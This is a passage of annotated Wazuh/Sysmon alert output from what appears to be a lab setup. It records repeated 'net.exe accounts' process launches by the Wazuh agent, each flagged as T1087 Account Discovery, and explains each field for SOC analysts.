No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:38.927+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:38.927+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534558.2244195
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:36.4109022Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290252
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:36.261 ProcessGuid: {94294ddc-be5c-680a-1c0c-000000000e00} ProcessId: 11144 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00} ParentProcessId: 664 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:36.261
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be5c-680a-1c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be55-680a-1a0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:39.756+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:39.756+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534559.2249246
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:37.0200822Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290311
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:37.010 ProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00} ProcessId: 16636 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:37.010
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be5d-680a-1d0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:41.654+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:41.654+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534561.2254483
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:38.6904847Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290435
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:38.616 ProcessGuid: {94294ddc-be5e-680a-1f0c-000000000e00} ProcessId: 16440 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00} ParentProcessId: 16636 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:38.616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be5e-680a-1f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be5d-680a-1d0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:46.117+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:46.117+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534566.2259542
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:42.0654954Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290736
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:42.059 ProcessGuid: {94294ddc-be62-680a-200c-000000000e00} ProcessId: 8592 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:42.059
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be62-680a-200c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
